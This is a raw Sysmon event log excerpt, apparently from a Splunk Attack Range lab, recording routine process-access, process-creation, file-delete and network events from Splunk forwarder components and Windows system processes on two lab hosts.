08:06:52.111{466BC892-02AD-60E8-0500-00000000CF01}408476C:\Windows\system32\csrss.exe{466BC892-F81C-60EB-EB7D-00000000CF01}5752C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001054325Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:52.095{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F81C-60EB-EB7D-00000000CF01}5752C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001054324Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:52.097{466BC892-F81C-60EB-EB7D-00000000CF01}5752C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001054323Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:52.080{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=98EAA37D9198B2C744803303621726DB,SHA256=8E4A24B766E91D3F64BE0482927A45BD2B4D5581CD1F7EE289FDC8D1B809B244,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810225Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:53.787{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=61CCDD6DC2EF98B13562D911F68B6FB8,SHA256=099D411096732C2B35E98FE4A5C10CF3CBB075CB7738FCBE3757700361035503,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001054360Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:53.981{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F81D-60EB-EE7D-00000000CF01}9724C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054359Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:53.981{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054358Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:53.981{466BC892-02AD-60E8-0500-00000000CF01}408524C:\Windows\system32\csrss.exe{466BC892-F81D-60EB-EE7D-00000000CF01}9724C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001054357Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:06:53.981{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054356Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:53.981{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054355Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:06:53.981{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054354Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:53.981{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F81D-60EB-EE7D-00000000CF01}9724C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001054353Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:53.966{466BC892-F81D-60EB-EE7D-00000000CF01}9724C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001054352Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:53.732{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2EBCD22AA40BBC94805CF6C7F39E8840,SHA256=C0AA324302DF00F108899B80ABC0952883D32B4FA037DC8C9E4FFA0CFB62A91E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001054351Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:53.550{466BC892-F81D-60EB-ED7D-00000000CF01}100401724C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054350Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:53.363{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F81D-60EB-ED7D-00000000CF01}10040C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054349Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:53.363{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054348Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:06:53.363{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054347Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:53.363{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054346Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:06:53.363{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054345Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:53.363{466BC892-02AD-60E8-0500-00000000CF01}408424C:\Windows\system32\csrss.exe{466BC892-F81D-60EB-ED7D-00000000CF01}10040C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001054344Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:53.347{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F81D-60EB-ED7D-00000000CF01}10040C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001054343Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:53.349{466BC892-F81D-60EB-ED7D-00000000CF01}10040C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001054342Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:53.095{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1ECA95504E4DD860F2EDA0B66C7769F0,SHA256=44A43DE69D03AACDDD2977E8960ED70046594A121726E8D66B1A89F5E9EEA3BF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810226Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:06:54.805{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E8484E9EB64DEC2B1E5103C9E68C38F6,SHA256=5541E2C2E2B435A08F17F4C0E2B6534A15E2883462D3DA396611A5FE0F5F8BF8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054363Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:54.980{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8ADFF6366B548F37DD89F797CC570C59,SHA256=88043A0D496256357391EC260C9213435FE2A12E14180592D49414DFA50977B5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054362Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:54.112{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C8E39246058F3C23F3D50D343FD439BC,SHA256=21B0FCD6B161038076AD64473F9B6DD4D5C2C560B1DA282DA4824A896BE9E113,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001054361Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:54.112{466BC892-02AF-60E8-0D00-00000000CF01}900696C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2C00-00000000CF01}3064C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+b4d7|c:\windows\system32\rpcss.dll+8257|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
23542300x8000000000000000810228Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:55.852{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4235B7DB60DE5007119552AE8560D035,SHA256=1AC71155180A259C64F2FAA6C2809BDAFFCF422572AF564E5C305B13516D2BE2,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001054365Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:55.512{466BC892-02AD-60E8-0B00-00000000CF01}6249844C:\Windows\system32\lsass.exe{466BC892-02AB-60E8-0100-00000000CF01}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96ef2|C:\Windows\system32\kerberos.DLL+793e4|C:\Windows\system32\kerberos.DLL+1443f|C:\Windows\system32\lsasrv.dll+2d231|C:\Windows\system32\lsasrv.dll+2b3f4|C:\Windows\system32\lsasrv.dll+30949|C:\Windows\system32\lsasrv.dll+2e2a7|C:\Windows\system32\lsasrv.dll+2d231|C:\Windows\system32\lsasrv.dll+15e0d|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 23542300x80000000000000001054364Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:55.130{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=68B606DA64E5FD2AC35098E41085BECB,SHA256=C1B3C1B90D16452F97E32D884CC934A97F3D973F51EFDA8F2602D93F5D82756D,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000810227Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:54.295{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57452-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000810229Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:56.868{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E6AFA7335B9A0C1880120CEB71046EFF,SHA256=B600FF5C2ABDCD2C992CF91C29C4DE44F7FA8D22C73733EA83EFCC5D4DE6A44E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054368Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:56.532{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 